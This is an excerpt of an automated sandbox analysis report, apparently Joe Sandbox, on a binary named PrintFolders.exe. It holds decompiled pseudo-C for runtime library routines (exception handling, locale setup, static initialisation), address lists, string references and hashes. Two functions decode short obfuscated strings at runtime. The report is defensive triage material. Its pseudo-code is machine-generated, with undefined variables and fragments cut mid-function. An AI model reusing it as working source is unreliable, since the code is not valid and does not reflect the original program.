											_v12 = 0;
											L19:
											E0041E2B8(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x450ccc = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x450cd0 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E004135F1(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E004135F1(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E00413517();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x0041a2ed
0x0041a2f6
0x0041a2fb
0x0041a305
0x0041a308
0x0041a325
0x0041a326
0x0041a339
0x0041a33e
0x0041a346
0x0041a34c
0x0041a34f
0x0041a351
0x0041a358
0x0041a358
0x0041a35a
0x0041a35d
0x0041a360
0x0041a367
0x0041a380
0x0041a385
0x0041a387
0x0041a3a8
0x0041a3b0
0x0041a3b3
0x0041a3ce
0x0041a3d1
0x0041a3d8
0x0041a3dc
0x0041a3de
0x0041a3e5
0x0041a3e8
0x0041a3ea
0x0041a3ec
0x0041a3ee
0x0041a3f8
0x0041a3f8
0x0041a3fa
0x0041a400
0x0041a403
0x0041a405
0x0041a40b
0x0041a40c
0x0041a412
0x0041a415
0x0041a416
0x0041a41c
0x0041a41f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041a3f0
0x0041a3f0
0x0041a3f0
0x0041a3f3
0x0041a3f4
0x0041a3f4
0x00000000
0x0041a3f0
0x0041a3e0
0x00000000
0x0041a3e0
0x0041a3b8
0x0041a3b8
0x0041a3b9
0x0041a3be
0x0041a3c0
0x0041a3c2
0x0041a3c7
0x0041a3c7
0x00000000
0x0041a3c7
0x0041a389
0x0041a38e
0x0041a390
0x0041a391
0x00000000
0x0041a391
0x0041a353
0x0041a356
0x00000000
0x00000000
0x00000000
0x0041a356
0x0041a30a
0x0041a30d
0x00000000
0x00000000
0x0041a30f
0x0041a316
0x0041a317
0x0041a319
0x0041a31e
0x00000000
0x0041a31e
0x00000000

Strings

C:\Program Files (x86)\PrintFolders\PrintFolders.exe, xrefs: 0041A330, 0041A337, 0041A36D

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Program Files (x86)\PrintFolders\PrintFolders.exe
API String ID: 0-2080567260
Opcode ID: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
Instruction ID: b8ab9d9bf59b97dbdceff1942ea396bbaab855526052e627d1082f7e5706c01d
Opcode Fuzzy Hash: 0e731db7584ad60d578d779bbaf5b01c679ed323d4b1edda6f57c3d6e2435286
Instruction Fuzzy Hash: C041B671A01218AFCB16DF9ADC85ADFBBB8EB85314F10016BF81097341D7789A91CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 10004FCB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E10004FCB(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E100048DC(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E100048DC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E10003F46(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E10003E79(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E10004BA1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E100076E4(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x10004fcb
0x10004fcb
0x10004fd2
0x10004fdb
0x100050fa
0x10004fe1
0x10004fe1
0x10004fe2
0x10004fe3
0x10004fed
0x10004ff0
0x10004ff6
0x10005000
0x10005025
0x1000502a
0x1000502f
0x100050f6
0x00000000
0x100050f7
0x1000502f
0x10005000
0x10005035
0x10005038
0x1000503b
0x10005041
0x10005047
0x10005059
0x1000505e
0x10005061
0x10005064
0x10005067
0x1000506a
0x10005070
0x10005076
0x10005079
0x1000507c
0x1000508b
0x1000508c
0x1000508c
0x10005091
0x100050a4
0x100050a6
0x100050ab
0x100050b6
0x100050b8
0x100050ba
0x100050d6
0x100050db
0x100050de
0x100050de
0x100050b6
0x100050ab
0x100050e4
0x100050e5
0x100050e8
0x100050eb
0x100050ee
0x100050f1
0x1000507c
0x00000000
0x10005070
0x100050fb
0x10005100
0x10005104
0x10005107
0x10005108
0x10005109
0x1000510a
0x1000510f
0x10005187
0x10005189
0x10005111
0x10005111
0x10005117
0x00000000
0x10005119
0x1000511c
0x1000511f
0x10005126
0x10005129
0x1000512d
0x1000515f
0x10005162
0x10005169
0x1000516f
0x10005179
0x10005182
0x10005182
0x10005179
0x1000516f
0x10005183
0x1000512f
0x1000512f
0x1000512f
0x10005132
0x10005132
0x10005136
0x00000000
0x00000000
0x1000513a
0x1000514e
0x1000514e
0x1000513c
0x1000513c
0x10005142
0x00000000
0x10005144
0x10005144
0x10005147
0x1000514c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000514c
0x10005142
0x10005157
0x10005159
0x00000000
0x1000515b
0x1000515b
0x1000515b
0x00000000
0x10005159
0x10005152
0x10005154
0x00000000
0x10005154
0x00000000
0x00000000
0x00000000
0x1000511f
0x10005117
0x1000518a
0x1000518e
0x1000518e

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 10004FF0

Strings

RCC, xrefs: 1000500A
MOC, xrefs: 10005002

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 4d7ed7e1a438cb125378e558f69cca30710cf17c4f75dbaa5e6bce22c7dbe1d5
Instruction ID: d582f20fa4c8ccc8f50c3cacdc6089d2bedb682b0b99dde694d4e72c5554890f
Opcode Fuzzy Hash: 4d7ed7e1a438cb125378e558f69cca30710cf17c4f75dbaa5e6bce22c7dbe1d5
Instruction Fuzzy Hash: EB41AC71900209EFEF16CF94CC81AEE7BB5FF48385F158099F909A7265D736AA50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004124BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E004124BC(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E00411D96(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00411D96(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E0040FC88(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E0040FBBB(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00412092(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00419C49(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x004124bc
0x004124bc
0x004124c3
0x004124cc
0x004125eb
0x004124d2
0x004124d4
0x004124de
0x004124e1
0x004124e7
0x004124f1
0x00412516
0x0041251b
0x00412520
0x004125e7
0x00000000
0x004125e8
0x00412520
0x004124f1
0x00412526
0x00412529
0x0041252c
0x00412532
0x00412538
0x0041254a
0x0041254f
0x00412552
0x00412555
0x00412558
0x0041255b
0x00412561
0x00412567
0x0041256a
0x0041256d
0x0041257c
0x0041257d
0x0041257d
0x00412582
0x00412595
0x00412597
0x0041259c
0x004125a7
0x004125a9
0x004125ab
0x004125c7
0x004125cc
0x004125cf
0x004125cf
0x004125a7
0x0041259c
0x004125d5
0x004125d6
0x004125d9
0x004125dc
0x004125df
0x004125e2
0x0041256d
0x00000000
0x00412561
0x004125ec
0x004125f1
0x004125f5
0x004125f8
0x004125f9
0x004125fa
0x004125fb
0x00412600
0x00412678
0x0041267a
0x00412602
0x00412602
0x00412608
0x00000000
0x0041260a
0x0041260d
0x00412610
0x00412617
0x0041261a
0x0041261e
0x00412650
0x00412653
0x0041265a
0x00412660
0x0041266a
0x00412673
0x00412673
0x0041266a
0x00412660
0x00412674
0x00412620
0x00412620
0x00412620
0x00412623
0x00412623
0x00412627
0x00000000
0x00000000
0x0041262b
0x0041263f
0x0041263f
0x0041262d
0x0041262d
0x00412633
0x00000000
0x00412635
0x00412635
0x00412638
0x0041263d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041263d
0x00412633
0x00412648
0x0041264a
0x00000000
0x0041264c
0x0041264c
0x0041264c
0x00000000
0x0041264a
0x00412643
0x00412645
0x00000000
0x00412645
0x00000000
0x00000000
0x00000000
0x00412610
0x00412608
0x0041267b
0x0041267f
0x0041267f

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004124E1

Strings

MOC, xrefs: 004124F3
RCC, xrefs: 004124FB

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 188dd02d7599aa30b8f70c009784331bdac1aa484947d381b84c6db6c6d716c1
Instruction ID: ad6c17696073472ca42aa8dfa0ec8590c08af3ebdb16e25686bd643ee096a47e
Opcode Fuzzy Hash: 188dd02d7599aa30b8f70c009784331bdac1aa484947d381b84c6db6c6d716c1
Instruction Fuzzy Hash: 2A416A71900109BFCF16DF94CE91AEEBBB6FF48304F18806AF905A7251D3799AA0DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00403F10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00403F10(intOrPtr _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v48;
				void* __ecx;
				void* __ebp;
				signed int _t34;
				signed int _t42;
				void* _t52;
				intOrPtr _t61;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t74;
				void* _t75;

				_push(0xffffffff);
				_push(0x42c40f);
				_push( *[fs:0x0]);
				_push(_t61);
				_t34 =  *0x43d054; // 0x7bd02ead
				_push(_t34 ^ _t72);
				 *[fs:0x0] =  &_v16;
				_t68 = _t61;
				_v20 = _t68;
				E0040E0A3(_t61, 0);
				_v8 = 0;
				 *((intOrPtr*)(_t68 + 4)) = 0;
				 *((char*)(_t68 + 8)) = 0;
				 *((intOrPtr*)(_t68 + 0xc)) = 0;
				 *((char*)(_t68 + 0x10)) = 0;
				 *((intOrPtr*)(_t68 + 0x14)) = 0;
				 *((short*)(_t68 + 0x18)) = 0;
				 *((intOrPtr*)(_t68 + 0x1c)) = 0;
				 *((short*)(_t68 + 0x20)) = 0;
				 *((intOrPtr*)(_t68 + 0x24)) = 0;
				 *((char*)(_t68 + 0x28)) = 0;
				 *((intOrPtr*)(_t68 + 0x2c)) = 0;
				 *((char*)(_t68 + 0x30)) = 0;
				_t39 = _a4;
				_v8 = 6;
				if(_a4 == 0) {
					E0040E056("bad locale name");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0xffffffff);
					_push(0x42c430);
					_push( *[fs:0x0]);
					_push(_t68);
					_t42 =  *0x43d054; // 0x7bd02ead
					_push(_t42 ^ _t74);
					 *[fs:0x0] =  &_v48;
					_t69 = _t61;
					E0040E3D1(_t61, _t69);
					_t46 =  *((intOrPtr*)(_t69 + 0x2c));
					_t75 = _t74 + 4;
					if( *((intOrPtr*)(_t69 + 0x2c)) != 0) {
						E00415F78(_t46);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x2c)) = 0;
					_t47 =  *((intOrPtr*)(_t69 + 0x24));
					if( *((intOrPtr*)(_t69 + 0x24)) != 0) {
						E00415F78(_t47);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x24)) = 0;
					_t48 =  *((intOrPtr*)(_t69 + 0x1c));
					if( *((intOrPtr*)(_t69 + 0x1c)) != 0) {
						E00415F78(_t48);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					_t49 =  *((intOrPtr*)(_t69 + 0x14));
					if( *((intOrPtr*)(_t69 + 0x14)) != 0) {
						E00415F78(_t49);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0x14)) = 0;
					_t50 =  *((intOrPtr*)(_t69 + 0xc));
					if( *((intOrPtr*)(_t69 + 0xc)) != 0) {
						E00415F78(_t50);
						_t75 = _t75 + 4;
					}
					 *((intOrPtr*)(_t69 + 0xc)) = 0;
					_t51 =  *((intOrPtr*)(_t69 + 4));
					if( *((intOrPtr*)(_t69 + 4)) != 0) {
						E00415F78(_t51);
					}
					 *((intOrPtr*)(_t69 + 4)) = 0;
					_t52 = E0040E0FB(_t69);
					 *[fs:0x0] = _v20;
					return _t52;
				} else {
					E0040E386(_t61, _t68, _t39);
					 *[fs:0x0] = _v16;
					return _t68;
				}
			}

0x00403f13
0x00403f15
0x00403f20
0x00403f21
0x00403f23
0x00403f2a
0x00403f2e
0x00403f34
0x00403f36
0x00403f3b
0x00403f40
0x00403f47
0x00403f4e
0x00403f52
0x00403f59
0x00403f5f
0x00403f66
0x00403f6a
0x00403f6d
0x00403f71
0x00403f74
0x00403f77
0x00403f7a
0x00403f7d
0x00403f80
0x00403f86
0x00403fab
0x00403fb0
0x00403fb1
0x00403fb2
0x00403fb3
0x00403fb4
0x00403fb5
0x00403fb6
0x00403fb7
0x00403fb8
0x00403fb9
0x00403fba
0x00403fbb
0x00403fbc
0x00403fbd
0x00403fbe
0x00403fbf
0x00403fc3
0x00403fc5
0x00403fd0
0x00403fd1
0x00403fd2
0x00403fd9
0x00403fdd
0x00403fe3
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x00403ff6
0x00403ffb
0x00403ffb
0x00403ffe
0x00404005
0x0040400a
0x0040400d
0x00404012
0x00404012
0x00404015
0x0040401c
0x00404021
0x00404024
0x00404029
0x00404029
0x0040402c
0x00404033
0x00404038
0x0040403b
0x00404040
0x00404040
0x00404043
0x0040404a
0x0040404f
0x00404052
0x00404057
0x00404057
0x0040405a
0x00404061
0x00404066
0x00404069
0x0040406e
0x00404073
0x0040407a
0x00404082
0x0040408e
0x00403f88
0x00403f8a
0x00403f97
0x00403fa3
0x00403fa3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00403F3B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403F8A

Part of subcall function 0040E386: _Yarn.LIBCPMT ref: 0040E3A5
Part of subcall function 0040E386: _Yarn.LIBCPMT ref: 0040E3C9

Strings

bad locale name, xrefs: 00403FA6

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 0698450c758f5080945dd03671431322a62a555b97a6e35c8aa63d649f4640dc
Instruction ID: 0e1965beb74f9ff9c4f9f037bd33cd57e17261f8de89b9630023cdf888844aec
Opcode Fuzzy Hash: 0698450c758f5080945dd03671431322a62a555b97a6e35c8aa63d649f4640dc
Instruction Fuzzy Hash: E0119171904B849FD320CF69C901747BBF4EB19714F004A2EE849D3B81D7B9A504CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00409290 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409290(void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				signed int _t10;
				intOrPtr _t13;
				void* _t25;
				void* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t10 =  *0x43d054; // 0x7bd02ead
				_v8 = _t10 ^ _t28;
				_v24 = 0x5c5a5d08;
				_v20 = 0x13434f4b;
				_t22 =  *((intOrPtr*)( *[fs:0x2c]));
				_t13 =  *0x450f00; // 0x80000016
				_v16 = 0x5a564743;
				_v12 = 0x4159;
				if(_t13 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0040EF48(_t13, 0x450f00);
					_t33 =  *0x450f00 - 0xffffffff;
					if( *0x450f00 == 0xffffffff) {
						asm("movq xmm0, [ebp-0x14]");
						 *0x450f30 = _v16;
						asm("movq [0x450f28], xmm0");
						 *0x450f34 = _v12;
						 *0x450f36 = 0x2e;
						E0040F25B(_t22, _t33, 0x42d460);
						E0040EEFE(0x450f00);
					}
				}
				return E0040EBBF(0x450f28, 0x2e, _v8 ^ _t28, _t25, _t26, _t27);
			}

0x00409290
0x00409290
0x00409290
0x00409296
0x0040929d
0x004092a7
0x004092b0
0x004092b7
0x004092b9
0x004092be
0x004092c5
0x004092d1
0x004092d8
0x004092e0
0x004092e7
0x004092ec
0x004092f1
0x004092ff
0x00409307
0x0040930d
0x00409313
0x0040931d
0x00409322
0x004092e7
0x00409338

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 0040931D

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

CGVZ, xrefs: 004092BE
YA, xrefs: 004092C5

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: CGVZ$YA
API String ID: 2296764815-3168216772
Opcode ID: 6b3f2edf672ee7163d045f6b3c2ee22b3a52908d77dd1c4be6e8844974e40f80
Instruction ID: e9a20a430b0b6afe83743553c5755eaecc9671b6d7f01568723836dade792edc
Opcode Fuzzy Hash: 6b3f2edf672ee7163d045f6b3c2ee22b3a52908d77dd1c4be6e8844974e40f80
Instruction Fuzzy Hash: 94012679E003089BCB20DFA5EC4159DB3B0EB09711F5006BEE90677392E778AA05CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00409460(void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v12;
				intOrPtr _v16;
				void* __ebx;
				signed int _t8;
				intOrPtr _t11;
				void* _t23;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t25 = __esi;
				_t24 = __edi;
				_t23 = __edx;
				_t8 =  *0x43d054; // 0x7bd02ead
				_v8 = _t8 ^ _t26;
				_v16 = 0x5e004041;
				_v12 = 0x5e46;
				_t20 =  *((intOrPtr*)( *[fs:0x2c]));
				_t11 =  *0x450f50; // 0x80000019
				if(_t11 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0040EF48(_t11, 0x450f50);
					_t31 =  *0x450f50 - 0xffffffff;
					if( *0x450f50 == 0xffffffff) {
						asm("movaps xmm0, [0x439d60]");
						 *0x450da8 = _v16;
						asm("movups [0x450d98], xmm0");
						 *0x450dac = _v12;
						 *0x450dae = 0x2e;
